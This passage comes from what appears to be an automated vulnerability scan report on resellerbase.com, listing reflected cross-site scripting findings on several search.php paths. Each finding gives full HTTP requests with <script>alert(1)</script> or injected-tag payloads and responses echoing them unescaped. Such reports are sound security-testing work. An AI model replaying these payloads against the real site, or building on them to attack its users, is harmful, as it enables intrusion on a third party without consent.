This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...dd39a<a>26ec7ce5e9b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php?keyword=search...dd39a<a>26ec7ce5e9b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2148. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload be753<script>alert(1)</script>80bf349cfd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&be753<script>alert(1)</script>80bf349cfd4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&be753<script>alert(1)</script>80bf349cfd4=1 was not found on this server.</p>
...[SNIP]...

2.2149. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c6e7e<a>db5d5011d00 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c6e7e<a>db5d5011d00 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c6e7e<a>db5d5011d00 was not found on this server.</p>
...[SNIP]...

2.2150. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78627<script>alert(1)</script>b8b88710dc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail78627<script>alert(1)</script>b8b88710dc6/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail78627<script>alert(1)</script>b8b88710dc6/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2151. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5022<script>alert(1)</script>7993d84aba1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30a5022<script>alert(1)</script>7993d84aba1/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30a5022<script>alert(1)</script>7993d84aba1/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2152. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a5b96<script>alert(1)</script>2ea269148d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesa5b96<script>alert(1)</script>2ea269148d2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesa5b96<script>alert(1)</script>2ea269148d2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2153. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a029<script>alert(1)</script>c59b8ee40d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos3a029<script>alert(1)</script>c59b8ee40d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos3a029<script>alert(1)</script>c59b8ee40d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2154. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8a572<script>alert(1)</script>4637932f3b6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/search.php8a572<script>alert(1)</script>4637932f3b6?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php8a572<script>alert(1)</script>4637932f3b6?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2155. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4f3e4<a>4232cd4f0d4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search4f3e4<a>4232cd4f0d4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search4f3e4<a>4232cd4f0d4&opt=2 was not found on this server.</p>
...[SNIP]...

2.2156. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d3ec4<a>9ed03669bdb was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...d3ec4<a>9ed03669bdb&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php?keyword=search...d3ec4<a>9ed03669bdb&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2157. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f3eef<script>alert(1)</script>30c46aa1e64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&f3eef<script>alert(1)</script>30c46aa1e64=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&f3eef<script>alert(1)</script>30c46aa1e64=1 was not found on this server.</p>
...[SNIP]...

2.2158. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3611a<a>81afaa1cf26 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=23611a<a>81afaa1cf26 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=23611a<a>81afaa1cf26 was not found on this server.</p>
...[SNIP]...

2.2159. http://www.resellerbase.com/detail/30/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3e2cc<script>alert(1)</script>b214ea69c11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3e2cc<script>alert(1)</script>b214ea69c11/30/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3e2cc<script>alert(1)</script>b214ea69c11/30/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2160. http://www.resellerbase.com/detail/30/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 12d75<script>alert(1)</script>c1ea4fed932 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3012d75<script>alert(1)</script>c1ea4fed932/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3012d75<script>alert(1)</script>c1ea4fed932/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2161. http://www.resellerbase.com/detail/30/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a69b0<script>alert(1)</script>25e4ac4b102 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesa69b0<script>alert(1)</script>25e4ac4b102/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesa69b0<script>alert(1)</script>25e4ac4b102/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2162. http://www.resellerbase.com/detail/30/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b079f<script>alert(1)</script>0b85c2ddc45 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/search.phpb079f<script>alert(1)</script>0b85c2ddc45?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/search.phpb079f<script>alert(1)</script>0b85c2ddc45?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2163. http://www.resellerbase.com/detail/30/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3abdf<a>59256de340 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/search.php?keyword=search...&Submit3=Search3abdf<a>59256de340&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/search.php?keyword=search...&Submit3=Search3abdf<a>59256de340&opt=2 was not found on this server.</p>
...[SNIP]...

2.2164. http://www.resellerbase.com/detail/30/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a967d<a>c920ee11251 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/search.php?keyword=search...a967d<a>c920ee11251&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/search.php?keyword=search...a967d<a>c920ee11251&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2165. http://www.resellerbase.com/detail/30/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload de49b<script>alert(1)</script>0daf5776181 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

